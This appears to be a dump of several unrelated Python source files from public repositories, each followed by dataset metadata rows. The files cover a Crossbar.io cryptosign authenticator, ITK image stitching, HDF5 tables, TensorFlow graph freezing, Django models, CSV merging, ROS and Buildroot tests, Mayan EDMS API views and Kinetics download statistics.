from autobahn.wamp.exception import ApplicationError
from autobahn.util import hl, hltype, hlid, hlval
# a simple principals database. in real world use, this likely would be
# replaced by some persistent database used to store principals.
PRINCIPALS = [
{
# when a session is authenticating use one of the authorized_keys,
# then assign it all the data below
"authid": "client01@example.com",
"realm": "devices",
"role": "device",
"extra": {
"foo": 23
},
"authorized_keys": [
"545efb0a2192db8d43f118e9bf9aee081466e1ef36c708b96ee6f62dddad9122"
]
},
{
"authid": "client02@example.com",
"realm": "devices",
"role": "device",
"extra": {
"foo": 42,
"bar": "baz"
},
"authorized_keys": [
"9c194391af3bf566fc11a619e8df200ba02efb35b91bdd98b424f20f4163875e",
"585df51991780ee8dce4766324058a04ecae429dffd786ee80839c9467468c28"
]
}
]
log = make_logger()
async def create_authenticator(config, controller):
"""
Creates and returns a function to do authentication. The actual
authentication method will be called like:
authenticate(realm, authid, session_details)
Note that this function can itself do async work (as can the
"authenticate" method). For example, we could connect to a
database here (and then use that connection in the authenticate()
method)
'controller' will be None unless `"expose_controller": true` is in
the config.
"""
log.info(
'create_authenticator(config={config}) {func}',
config=pformat(config),
func=hltype(create_authenticator),
)
pubkey_to_principals = {}
for p in PRINCIPALS:
for k in p['authorized_keys']:
if k in pubkey_to_principals:
raise Exception("ambiguous key {}".format(k))
else:
pubkey_to_principals[k] = p
async def authenticate(realm, authid, details):
"""
this is our dynamic authenticator procedure that will be called by Crossbar.io
when a session is authenticating
"""
log.info(
'authenticate(realm="{realm}", authid="{authid}", details={details}) {func}',
realm=hl(realm),
authid=hl(authid),
details=details,
func=hltype(create_authenticator),
)
assert('authmethod' in details)
assert(details['authmethod'] == 'cryptosign')
assert('authextra' in details)
assert('pubkey' in details['authextra'])
pubkey = details['authextra']['pubkey']
log.info(
'authenticating session using realm="{realm}", pubkey={pubkey} .. {func}',
realm=hl(realm),
pubkey=hl(pubkey),
func=hltype(create_authenticator),
)
if pubkey in pubkey_to_principals:
principal = pubkey_to_principals[pubkey]
auth = {
'pubkey': pubkey,
'realm': principal['realm'],
'authid': principal['authid'],
'role': principal['role'],
'extra': principal['extra'],
'cache': True
}
            # Note: with WAMP-cryptosign, a client may or may not request a `realm`, but in any case the
            # effective realm the client is authenticated to is the one returned in the principal's `auth['realm']` (!)
effective_realm = auth['realm']
log.info(
'found valid principal authid="{authid}", authrole="{authrole}", realm="{realm}" matching given client public key {func}',
func=hltype(create_authenticator),
authid=hl(auth['authid']),
authrole=hl(auth['role']),
realm=hl(effective_realm),
)
return auth
else:
msg = 'no principal with matching public key 0x{}'.format(pubkey)
log.warn(msg)
raise ApplicationError('com.example.no_such_user', msg)
return authenticate
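# Minimal sketch of exercising the authenticator outside of Crossbar.io (e.g.
# from a test). The empty config and the reuse of the first key in PRINCIPALS
# are illustrative assumptions, so the sketch is left commented out:
#
# import asyncio
#
# async def _demo():
#     authenticate = await create_authenticator(config={}, controller=None)
#     principal = await authenticate(
#         realm='devices',
#         authid='client01@example.com',
#         details={
#             'authmethod': 'cryptosign',
#             'authextra': {'pubkey': PRINCIPALS[0]['authorized_keys'][0]},
#         })
#     print(principal['authid'], principal['role'])
#
# asyncio.run(_demo())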
| 33.195313
| 138
| 0.589786
| 0
| 0
| 0
| 0
| 0
| 0
| 3,102
| 0.730054
| 2,044
| 0.481054
|
3bdfdc921f29e9f07e8dacf34bfc075882611de3
| 1,368
|
py
|
Python
|
syd/syd_stitch_image.py
|
OpenSyd/syd
|
0f7478c7dedb623ab955e906c103cb64a7abb4b3
|
[
"Apache-2.0"
] | 4
|
2015-07-29T19:10:35.000Z
|
2020-11-17T07:48:41.000Z
|
syd/syd_stitch_image.py
|
OpenSyd/syd
|
0f7478c7dedb623ab955e906c103cb64a7abb4b3
|
[
"Apache-2.0"
] | 9
|
2015-05-14T09:07:37.000Z
|
2022-03-15T10:13:59.000Z
|
syd/syd_stitch_image.py
|
OpenSyd/syd
|
0f7478c7dedb623ab955e906c103cb64a7abb4b3
|
[
"Apache-2.0"
] | 3
|
2016-09-07T06:26:52.000Z
|
2016-10-04T12:29:03.000Z
|
#!/usr/bin/env python3
import itk
import syd
# -----------------------------------------------------------------------------
def stitch_image(db, image1, image2):
print('image1', image1)
print('image2', image2)
im1 = syd.read_itk_image(db, image1)
im2 = syd.read_itk_image(db, image2)
im = stitch_itk_image(im1, im2)
print('TODO: insert an image')
return im
# -----------------------------------------------------------------------------
def stitch_itk_image(im1, im2):
# FIXME -> to put in a external file itk related
# check image size and type
# FIXME
# create an image
ImageType = type(im1)
print(ImageType)
image = ImageType.New()
# get sizes
region1 = im1.GetLargestPossibleRegion()
region2 = im2.GetLargestPossibleRegion()
a1 = im1.TransformIndexToPhysicalPoint(region1.GetIndex())
b1 = im1.TransformIndexToPhysicalPoint(region1.GetSize())
a2 = im2.TransformIndexToPhysicalPoint(region2.GetIndex())
b2 = im2.TransformIndexToPhysicalPoint(region2.GetSize())
print(a1, b1)
print(a2, b2)
# create new size
za = min(a1[2], a2[2], b1[2], b2[2])
zb = max(a1[2], a2[2], b1[2], b2[2])
# swap if decreasing coordinates
if (a1[2]>b1[2]):
zb,za = za,zb
a = a1
a[2] = za
b = b1
b[2] = zb
print(a, b)
return image
| 23.186441
| 79
| 0.557749
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 378
| 0.276316
|
3be0272cc4ef59d691881a66ca66a56c66ec41a0
| 2,617
|
py
|
Python
|
pylinear/h5table/ddt.py
|
npirzkal/pyLINEAR
|
00419dcbd91ea7b64386e6fe4f3164cd141333f2
|
[
"MIT"
] | null | null | null |
pylinear/h5table/ddt.py
|
npirzkal/pyLINEAR
|
00419dcbd91ea7b64386e6fe4f3164cd141333f2
|
[
"MIT"
] | null | null | null |
pylinear/h5table/ddt.py
|
npirzkal/pyLINEAR
|
00419dcbd91ea7b64386e6fe4f3164cd141333f2
|
[
"MIT"
] | null | null | null |
import numpy as np
import pdb
from . import columns
from . import h5utils
from .base import Base
class DDT(Base):
def __init__(self,segid):
self.segid=segid
self.pix=[]
self.xyg=columns.XYG()
self.wav=columns.WAV()
self.val=columns.VAL()
def extend(self,xyg,wav,val):
assert(len(xyg)==len(wav)==len(val)),'Must have same lengths'
self.xyg.extend(xyg)
self.wav.extend(wav)
self.val.extend(val)
def select(self,g):
if len(self)!=0 and len(g)!=0:
xyg,wav,val=[],[],[]
for i in g:
xyg.append(self.xyg[i])
wav.append(self.wav[i])
val.append(self.val[i])
self.xyg=columns.XYG(xyg)
self.wav=columns.WAV(wav)
self.val=columns.VAL(val)
def __str__(self):
return '{} for {}'.format(self.ttype,self.name)
def npix(self):
return len(self.pix)
def __len__(self):
return len(self.xyg)
def __getitem__(self,key):
return self.xyg[key],self.wav[key],self.val[key]
def __imul__(self,values):
self.val=columns.VAL([s*v for s,v in zip(self.val,values)])
return self
def __eq__(self,other):
if isinstance(self,other.__class__):
return self.__dict__==other.__dict__
else:
return False
@property
def name(self):
return '{}'.format(self.segid)
def writeH5(self,grp,**kwargs):
new=grp.require_group(self.name)
#new=grp.create_group(self.name)
for k,v in kwargs.items():
h5utils.writeAttr(new,k,v)
data=h5utils.writeData(new,self.ttype,self.xyg,self.wav,self.val)
pix=list(zip(*self.pix))
x=columns.X()
x.extend(list(pix[0]))
y=columns.Y()
y.extend(list(pix[1]))
pix=h5utils.writeData(new,'pix',x,y)
return new
def readH5(self,grp):
if self.name in grp:
new=grp[self.name]
data=h5utils.loadData(new,self.ttype)
self.xyg=columns.XYG(data['xyg'])
self.wav=columns.WAV(data['wav'])
self.val=columns.VAL(data['val'])
pix=h5utils.loadData(new,'pix')
self.pix=list(zip(list(pix['x']),list(pix['y'])))
else:
self.notFound()
#data=h5utils.loadData(grp)
#self.xyg=columns.XYG(data['xyg'])
#self.wav=columns.WAV(data['wav'])
#self.val=columns.VAL(data['val'])
| 24.231481
| 75
| 0.534964
| 2,509
| 0.958731
| 0
| 0
| 68
| 0.025984
| 0
| 0
| 231
| 0.088269
|
3be1c731ef6e27de1ae8fcab0e00a570b8b671ef
| 851
|
py
|
Python
|
tools/auto_freeze.py
|
airacid/pruned-face-detector
|
ef587e274ccf87633af653694890eb6712d6b3eb
|
[
"MIT"
] | 1
|
2021-11-01T02:39:36.000Z
|
2021-11-01T02:39:36.000Z
|
tools/auto_freeze.py
|
airacid/pruned-face-detector
|
ef587e274ccf87633af653694890eb6712d6b3eb
|
[
"MIT"
] | null | null | null |
tools/auto_freeze.py
|
airacid/pruned-face-detector
|
ef587e274ccf87633af653694890eb6712d6b3eb
|
[
"MIT"
] | 1
|
2021-11-01T02:39:37.000Z
|
2021-11-01T02:39:37.000Z
|
import os
import tensorflow as tf
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt_path', type=str)
parser.add_argument('--output_path', type=str)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
checkpoint = args.ckpt_path
##input_checkpoint
input_checkpoint = checkpoint
##input_graph
input_meta_graph = input_checkpoint + '.meta'
##output_node_names
output_node_names='tower_0/images,tower_0/boxes,tower_0/scores,tower_0/labels,tower_0/num_detections,training_flag'
#output_graph
output_graph = os.path.join(args.output_path,'detector.pb')
print('executed')
command="python tools/freeze.py --input_checkpoint %s --input_meta_graph %s --output_node_names %s --output_graph %s"\
%(input_checkpoint,input_meta_graph,output_node_names,output_graph)
os.system(command)
| 29.344828
| 119
| 0.774383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 356
| 0.418331
|
3be1c8da8fb0704e33d69f4791863e002d5b116a
| 2,045
|
py
|
Python
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 5
|
2020-07-14T07:48:10.000Z
|
2021-12-20T21:20:10.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 7
|
2021-03-26T03:13:38.000Z
|
2022-03-12T00:42:03.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 1
|
2021-02-16T07:04:25.000Z
|
2021-02-16T07:04:25.000Z
|
from django.db import models
# 1. Django does not support composite primary keys (Composite Primary Key).
# 2. Django does not support disabling the primary key (Disable Primary Key):
#    when no field of the table defines a Primary Key,
#    Django automatically adds an id field and puts the primary key on it.
#
#
# Normally, when InnoDB creates a table with no Primary Key defined,
#    it uses an existing Unique Key as the clustered index, if there is one.
#    If there is no Unique Key either, InnoDB creates a hidden PrimaryKey (clustered index).
#
#
# Therefore, a CREATE TABLE statement like the following cannot be reproduced 100% by a Model.
# CREATE TABLE `salaries` (
# `emp_no` int(11) NOT NULL,
# `salary` int(11) NOT NULL,
# `from_date` date NOT NULL,
# `to_date` date NOT NULL,
# PRIMARY KEY (`emp_no`,`from_date`)
# );
class salaries(models.Model):
"""
    CREATE TABLE `SQL3_salaries` (
        `id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
        `emp_no` integer NOT NULL,
        `salary` integer NOT NULL,
        `from_date` date NOT NULL,
        `to_date` date NOT NULL
    );
ALTER TABLE `SQL3_salaries` ADD CONSTRAINT `uc_emp_no_from_date` UNIQUE (`emp_no`, `from_date`);
"""
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
salary = models.IntegerField(verbose_name="薪资", null=False)
from_date = models.DateField(verbose_name="from_date", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'from_date'], name="uc_emp_no_from_date"), ]
class dept_manager(models.Model):
"""
    CREATE TABLE `SQL3_dept_manager` (
        `id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
        `dept_no` varchar(4) NOT NULL,
        `emp_no` integer NOT NULL,
        `to_date` date NOT NULL
    );
ALTER TABLE `SQL3_dept_manager` ADD CONSTRAINT `uc_emp_no_dept_no` UNIQUE (`emp_no`, `dept_no`);
"""
dept_no = models.CharField(verbose_name="部门编号", max_length=4, null=False)
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'dept_no'], name="uc_emp_no_dept_no"), ]
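def latest_salary_for(emp_no):
    # Illustrative helper, not part of the original nowcoder exercise: because
    # (emp_no, from_date) is unique, the current salary row for an employee is
    # simply the one with the greatest from_date.
    return (salaries.objects
            .filter(emp_no=emp_no)
            .order_by('-from_date')
            .first())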
| 33.52459
| 109
| 0.684597
| 1,502
| 0.655609
| 0
| 0
| 0
| 0
| 0
| 0
| 1,561
| 0.681362
|
3be3d29eecfe1ea6c347859c1388d314f37ccbc5
| 1,247
|
py
|
Python
|
concat_csv.py
|
jweckman/vim
|
c225f36ab05c2bdcedfc9866c367c1ddc4cd3646
|
[
"MIT"
] | null | null | null |
concat_csv.py
|
jweckman/vim
|
c225f36ab05c2bdcedfc9866c367c1ddc4cd3646
|
[
"MIT"
] | null | null | null |
concat_csv.py
|
jweckman/vim
|
c225f36ab05c2bdcedfc9866c367c1ddc4cd3646
|
[
"MIT"
] | null | null | null |
import pandas as pd
from pathlib import Path
import sys
''' Concatenates all csv files in the folder passed as the first command-line argument '''
path = Path(sys.argv[1])
def get_csv_paths(path):
return [p for p in path.iterdir() if p.suffix == '.csv']
def ask_details():
print('Please specify the following:')
encoding = input('Encoding\n')
delimiter = input('Delimiter\n')
return encoding, delimiter
def get_frames(files_list, encoding, delimiter):
    return [pd.read_csv(p, sep=delimiter, dtype='str', encoding=encoding) for p in files_list]
def concat_output(frames):
output = pd.DataFrame()
for df in frames:
output = pd.concat([output,df])
path_out = path / 'COMBINED.csv'
output.to_csv(path_out, sep=';', index=False)
if __name__ == '__main__':
csv_files = get_csv_paths(path)
encoding, delimiter = ask_details()
try:
frames = get_frames(csv_files, encoding, delimiter)
concat_output(frames)
except Exception as e:
print('Seems like there were files that could not be read\n')
print(str(e))
encoding, delimiter = ask_details()
frames = get_frames(csv_files, encoding, delimiter)
concat_output(frames)
| 30.414634
| 94
| 0.653569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 212
| 0.170008
|
3be3ffc19dbd5fc20c5420fc3ab9c6320aeeee0a
| 2,589
|
py
|
Python
|
catkin_ws/src/rostest_example/tests/duckiecall_tester_node.py
|
DiegoOrtegoP/Software
|
4a07dd2dab29db910ca2e26848fa6b53b7ab00cd
|
[
"CC-BY-2.0"
] | 12
|
2016-04-14T12:21:46.000Z
|
2021-06-18T07:51:40.000Z
|
catkin_ws/src/rostest_example/tests/duckiecall_tester_node.py
|
DiegoOrtegoP/Software
|
4a07dd2dab29db910ca2e26848fa6b53b7ab00cd
|
[
"CC-BY-2.0"
] | 14
|
2017-03-03T23:33:05.000Z
|
2018-04-03T18:07:53.000Z
|
catkin_ws/src/rostest_example/tests/duckiecall_tester_node.py
|
DiegoOrtegoP/Software
|
4a07dd2dab29db910ca2e26848fa6b53b7ab00cd
|
[
"CC-BY-2.0"
] | 113
|
2016-05-03T06:11:42.000Z
|
2019-06-01T14:37:38.000Z
|
#!/usr/bin/env python
import rospy
import unittest, rostest
from rostest_example.Quacker import *
from std_msgs.msg import String, Int32
class DuckiecallTesterNode(unittest.TestCase):
def __init__(self, *args):
super(DuckiecallTesterNode, self).__init__(*args)
self.msg_duckiecall = String()
self.msg_received = False
def setup(self):
# Setup the node
rospy.init_node('duckiecall_tester_node', anonymous=False)
# Setup the publisher and subscriber
self.pub_num_of_quacks = rospy.Publisher("~number_of_quacks", Int32, queue_size=1, latch=True)
self.sub_duckiecall = rospy.Subscriber("~duckiecall", String, self.duckiecallCallback)
# Wait for the node to finish starting up
timeout = rospy.Time.now() + rospy.Duration(5) # Wait at most 5 seconds for the node to come up
while (self.pub_num_of_quacks.get_num_connections() < 1 or self.sub_duckiecall.get_num_connections() < 1) and \
not rospy.is_shutdown() and rospy.Time.now() < timeout:
rospy.sleep(0.1)
def duckiecallCallback(self, msg_duckiecall):
self.msg_duckiecall = msg_duckiecall
self.msg_received = True
def test_publisher_and_subscriber(self):
self.setup() # Setup the node
self.assertGreaterEqual(self.pub_num_of_quacks.get_num_connections(), 1, "No connections found on num_of_quacks topic")
self.assertGreaterEqual(self.sub_duckiecall.get_num_connections(), 1, "No connections found on duckiecall topic")
def test_duckiecall_output(self):
self.setup() # Setup the node
# Send the message to the number_of_quacks topic
msg_num_of_quacks = Int32()
msg_num_of_quacks.data = 3
self.pub_num_of_quacks.publish(msg_num_of_quacks)
# Wait for the message to be received
timeout = rospy.Time.now() + rospy.Duration(5) # Wait at most 5 seconds for the node to reply
while not self.msg_received and not rospy.is_shutdown() and rospy.Time.now() < timeout:
rospy.sleep(0.1)
# Send an error if the timeout was hit
self.assertLess(rospy.Time.now(), timeout, "The test timed out with no response from the duckiecall_node")
# Test the response
response = self.msg_duckiecall.data
self.assertEqual(response, "Quack! Quack! Quack!") # Three Quacks! expected
if __name__ == '__main__':
rospy.init_node('duckiecall_tester_node', anonymous=False)
rostest.rosrun('rostest_example', 'duckiecall_tester_node', DuckiecallTesterNode)
| 43.15
| 127
| 0.696794
| 2,273
| 0.877945
| 0
| 0
| 0
| 0
| 0
| 0
| 709
| 0.273851
|
3be4dea35fbe812684c863cfb56967cde0971e92
| 1,679
|
py
|
Python
|
buildroot/support/testing/tests/init/test_busybox.py
|
rbrenton/hassos
|
fa6f7ac74ddba50e76f5779c613c56d937684844
|
[
"Apache-2.0"
] | 617
|
2015-01-04T14:33:56.000Z
|
2022-03-24T22:42:25.000Z
|
buildroot/support/testing/tests/init/test_busybox.py
|
rbrenton/hassos
|
fa6f7ac74ddba50e76f5779c613c56d937684844
|
[
"Apache-2.0"
] | 631
|
2015-01-01T22:53:25.000Z
|
2022-03-17T18:41:00.000Z
|
buildroot/support/testing/tests/init/test_busybox.py
|
rbrenton/hassos
|
fa6f7ac74ddba50e76f5779c613c56d937684844
|
[
"Apache-2.0"
] | 133
|
2015-03-03T18:40:05.000Z
|
2022-03-18T13:34:26.000Z
|
import infra.basetest
from tests.init.base import InitSystemBase as InitSystemBase
class InitSystemBusyboxBase(InitSystemBase):
config = infra.basetest.BASIC_TOOLCHAIN_CONFIG + \
"""
# BR2_TARGET_ROOTFS_TAR is not set
"""
def check_init(self):
super(InitSystemBusyboxBase, self).check_init("/bin/busybox")
class TestInitSystemBusyboxRo(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
# BR2_TARGET_GENERIC_REMOUNT_ROOTFS_RW is not set
BR2_TARGET_ROOTFS_SQUASHFS=y
"""
def test_run(self):
self.start_emulator("squashfs")
self.check_init()
self.check_network("eth0", 1)
class TestInitSystemBusyboxRw(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
BR2_TARGET_ROOTFS_EXT2=y
"""
def test_run(self):
self.start_emulator("ext2")
self.check_init()
self.check_network("eth0", 1)
class TestInitSystemBusyboxRoNet(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
BR2_SYSTEM_DHCP="eth0"
# BR2_TARGET_GENERIC_REMOUNT_ROOTFS_RW is not set
BR2_TARGET_ROOTFS_SQUASHFS=y
"""
def test_run(self):
self.start_emulator("squashfs")
self.check_init()
self.check_network("eth0")
class TestInitSystemBusyboxRwNet(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
BR2_SYSTEM_DHCP="eth0"
BR2_TARGET_ROOTFS_EXT2=y
"""
def test_run(self):
self.start_emulator("ext2")
self.check_init()
self.check_network("eth0")
| 25.830769
| 69
| 0.659321
| 1,581
| 0.941632
| 0
| 0
| 0
| 0
| 0
| 0
| 506
| 0.30137
|
3be559b23f04ad4fbb4310964aaa62522258d721
| 8,529
|
py
|
Python
|
mayan/apps/linking/api_views.py
|
darrenflexxu/Mayan-EDMS
|
6707365bfacd137e625ddc1b990168012246fa07
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/linking/api_views.py
|
darrenflexxu/Mayan-EDMS
|
6707365bfacd137e625ddc1b990168012246fa07
|
[
"Apache-2.0"
] | 5
|
2021-03-19T22:59:52.000Z
|
2022-03-12T00:13:16.000Z
|
mayan/apps/linking/api_views.py
|
Sumit-Kumar-Jha/mayan
|
5b7ddeccf080b9e41cc1074c70e27dfe447be19f
|
[
"Apache-2.0"
] | 1
|
2020-07-29T21:03:27.000Z
|
2020-07-29T21:03:27.000Z
|
from __future__ import absolute_import, unicode_literals
from django.shortcuts import get_object_or_404
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document
from mayan.apps.documents.permissions import permission_document_view
from mayan.apps.rest_api import generics
from .models import SmartLink
from .permissions import (
permission_smart_link_create, permission_smart_link_delete,
permission_smart_link_edit, permission_smart_link_view
)
from .serializers import (
ResolvedSmartLinkDocumentSerializer, ResolvedSmartLinkSerializer,
SmartLinkConditionSerializer, SmartLinkSerializer,
WritableSmartLinkSerializer
)
class APIResolvedSmartLinkDocumentListView(generics.ListAPIView):
"""
get: Returns a list of the smart link documents that apply to the document.
"""
mayan_object_permissions = {'GET': (permission_document_view,)}
serializer_class = ResolvedSmartLinkDocumentSerializer
def get_document(self):
document = get_object_or_404(klass=Document, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=document, permissions=(permission_document_view,),
user=self.request.user
)
return document
def get_smart_link(self):
smart_link = get_object_or_404(
klass=SmartLink.objects.get_for(document=self.get_document()),
pk=self.kwargs['smart_link_pk']
)
AccessControlList.objects.check_access(
obj=smart_link, permissions=(permission_smart_link_view,),
user=self.request.user
)
return smart_link
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(
APIResolvedSmartLinkDocumentListView, self
).get_serializer_context()
if self.kwargs:
context.update(
{
'document': self.get_document(),
'smart_link': self.get_smart_link(),
}
)
return context
def get_queryset(self):
return self.get_smart_link().get_linked_document_for(
document=self.get_document()
)
class APIResolvedSmartLinkView(generics.RetrieveAPIView):
"""
get: Return the details of the selected resolved smart link.
"""
lookup_url_kwarg = 'smart_link_pk'
mayan_object_permissions = {'GET': (permission_smart_link_view,)}
serializer_class = ResolvedSmartLinkSerializer
def get_document(self):
document = get_object_or_404(klass=Document, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=document, permissions=(permission_document_view,),
user=self.request.user
)
return document
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APIResolvedSmartLinkView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'document': self.get_document(),
}
)
return context
def get_queryset(self):
return SmartLink.objects.get_for(document=self.get_document())
class APIResolvedSmartLinkListView(generics.ListAPIView):
"""
get: Returns a list of the smart links that apply to the document.
"""
mayan_object_permissions = {'GET': (permission_smart_link_view,)}
serializer_class = ResolvedSmartLinkSerializer
def get_document(self):
document = get_object_or_404(klass=Document, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=document, permissions=(permission_document_view,),
user=self.request.user
)
return document
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APIResolvedSmartLinkListView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'document': self.get_document(),
}
)
return context
def get_queryset(self):
return SmartLink.objects.filter(
document_types=self.get_document().document_type
)
class APISmartLinkConditionListView(generics.ListCreateAPIView):
"""
get: Returns a list of all the smart link conditions.
post: Create a new smart link condition.
"""
serializer_class = SmartLinkConditionSerializer
def get_queryset(self):
return self.get_smart_link().conditions.all()
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APISmartLinkConditionListView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'smart_link': self.get_smart_link(),
}
)
return context
def get_smart_link(self):
if self.request.method == 'GET':
permission_required = permission_smart_link_view
else:
permission_required = permission_smart_link_edit
smart_link = get_object_or_404(klass=SmartLink, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=smart_link, permissions=(permission_required,),
user=self.request.user
)
return smart_link
class APISmartLinkConditionView(generics.RetrieveUpdateDestroyAPIView):
"""
delete: Delete the selected smart link condition.
get: Return the details of the selected smart link condition.
patch: Edit the selected smart link condition.
put: Edit the selected smart link condition.
"""
lookup_url_kwarg = 'condition_pk'
serializer_class = SmartLinkConditionSerializer
def get_queryset(self):
return self.get_smart_link().conditions.all()
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APISmartLinkConditionView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'smart_link': self.get_smart_link(),
}
)
return context
def get_smart_link(self):
if self.request.method == 'GET':
permission_required = permission_smart_link_view
else:
permission_required = permission_smart_link_edit
smart_link = get_object_or_404(klass=SmartLink, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=smart_link, permissions=(permission_required,),
user=self.request.user
)
return smart_link
class APISmartLinkListView(generics.ListCreateAPIView):
"""
get: Returns a list of all the smart links.
post: Create a new smart link.
"""
mayan_object_permissions = {'GET': (permission_smart_link_view,)}
mayan_view_permissions = {'POST': (permission_smart_link_create,)}
queryset = SmartLink.objects.all()
def get_serializer(self, *args, **kwargs):
if not self.request:
return None
return super(APISmartLinkListView, self).get_serializer(*args, **kwargs)
def get_serializer_class(self):
if self.request.method == 'GET':
return SmartLinkSerializer
else:
return WritableSmartLinkSerializer
class APISmartLinkView(generics.RetrieveUpdateDestroyAPIView):
"""
delete: Delete the selected smart link.
get: Return the details of the selected smart link.
patch: Edit the selected smart link.
put: Edit the selected smart link.
"""
mayan_object_permissions = {
'DELETE': (permission_smart_link_delete,),
'GET': (permission_smart_link_view,),
'PATCH': (permission_smart_link_edit,),
'PUT': (permission_smart_link_edit,)
}
queryset = SmartLink.objects.all()
def get_serializer(self, *args, **kwargs):
if not self.request:
return None
return super(APISmartLinkView, self).get_serializer(*args, **kwargs)
def get_serializer_class(self):
if self.request.method == 'GET':
return SmartLinkSerializer
else:
return WritableSmartLinkSerializer
| 30.569892
| 85
| 0.653183
| 7,820
| 0.916872
| 0
| 0
| 0
| 0
| 0
| 0
| 1,435
| 0.16825
|
3be6d032aab66cc3f999f8f1017e760af49f209f
| 4,013
|
py
|
Python
|
download_stats.py
|
zhengsipeng/kinetics-downloader
|
c85c6946a4408d1f9219441ae3f7aed679b10458
|
[
"MIT"
] | 263
|
2018-03-10T15:44:35.000Z
|
2022-03-16T10:57:30.000Z
|
download_stats.py
|
zhengsipeng/kinetics-downloader
|
c85c6946a4408d1f9219441ae3f7aed679b10458
|
[
"MIT"
] | 17
|
2018-09-13T00:30:22.000Z
|
2021-07-26T17:42:33.000Z
|
download_stats.py
|
zhengsipeng/kinetics-downloader
|
c85c6946a4408d1f9219441ae3f7aed679b10458
|
[
"MIT"
] | 85
|
2018-07-12T03:45:38.000Z
|
2022-03-21T23:11:36.000Z
|
import argparse, os
import lib.config as config
import lib.utils as utils
def count_present_and_missing(cls, directory, metadata):
"""
Count present and missing videos for a class based on metadata.
:param cls: The class. If None, count all videos (used for testing videos - no classes).
:param directory: Directory containing the videos.
:param metadata: Kinetics metadata json.
:return: Tuple: number present videos, number of missing videos
"""
present = 0
missing = 0
for key in metadata:
if cls is None or metadata[key]["annotations"]["label"] == cls:
if os.path.isfile(os.path.join(directory, "{}.mp4".format(key))):
present += 1
else:
missing += 1
return present, missing
def main(args):
# load video classes
classes = utils.load_json(config.CLASSES_PATH)
# load lists of videos
train_metadata = utils.load_json(config.TRAIN_METADATA_PATH)
val_metadata = utils.load_json(config.VAL_METADATA_PATH)
test_metadata = utils.load_json(config.TEST_METADATA_PATH)
num_found = 0
total = 0
total_train_present = 0
total_train_missing = 0
total_val_present = 0
total_val_missing = 0
# load subset
subset = None
if args.subset:
subset = utils.load_json(args.subset)
# count train and validation videos
for cls in classes:
if subset is not None and cls not in subset:
continue
total += 1
cls_train_path = os.path.join(config.TRAIN_ROOT, cls.replace(" ", "_"))
cls_valid_path = os.path.join(config.VALID_ROOT, cls.replace(" ", "_"))
train_found = False
valid_found = False
if os.path.isdir(cls_train_path):
train_present, train_missing = count_present_and_missing(cls, cls_train_path, train_metadata)
train_found = True
total_train_present += train_present
total_train_missing += train_missing
if os.path.isdir(cls_valid_path):
valid_present, valid_missing = count_present_and_missing(cls, cls_valid_path, val_metadata)
valid_found = True
total_val_present += valid_present
total_val_missing += valid_missing
if train_found or valid_found:
num_found += 1
if args.details:
print("class {}".format(cls))
if train_found:
print("train: {} / {}".format(train_present, train_present + train_missing))
if valid_found:
print("valid: {} / {}".format(valid_present, valid_present + valid_missing))
print()
# count test videos
test_present, test_missing = count_present_and_missing(None, config.TEST_ROOT, test_metadata)
# print
train_percent_found = 0
if total_train_present > 0:
train_percent_found = (total_train_present * 100) / (total_train_present + total_train_missing)
valid_percent_found = 0
if total_val_present > 0:
valid_percent_found = (total_val_present * 100) / (total_val_present + total_val_missing)
test_percent_found = 0
if test_present > 0:
test_percent_found = (test_present * 100) / (test_present + test_missing)
print("class stats:")
print("\t{:d} / {:d} classes found".format(num_found, total))
print()
print("video stats (only for found classes):")
print("\t{:d} / {:d} ({:.2f}%) train videos found".format(
total_train_present, total_train_present + total_train_missing, train_percent_found))
print("\t{:d} / {:d} ({:.2f}%) valid videos found".format(
total_val_present, total_val_present + total_val_missing, valid_percent_found))
print("\t{:d} / {:d} ({:.2f}%) test videos found".format(
test_present, test_present + test_missing, test_percent_found))
if __name__ == "__main__":
parser = argparse.ArgumentParser("Print statistics about downloaded videos.")
parser.add_argument("-d", "--details", action="store_true", default=False, help="detailed stats for each found class")
parser.add_argument("-s", "--subset", help="path to a JSON file containing a subset of Kinetics classes")
parsed = parser.parse_args()
main(parsed)
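# Example invocations (illustrative; run from the repository root so that the
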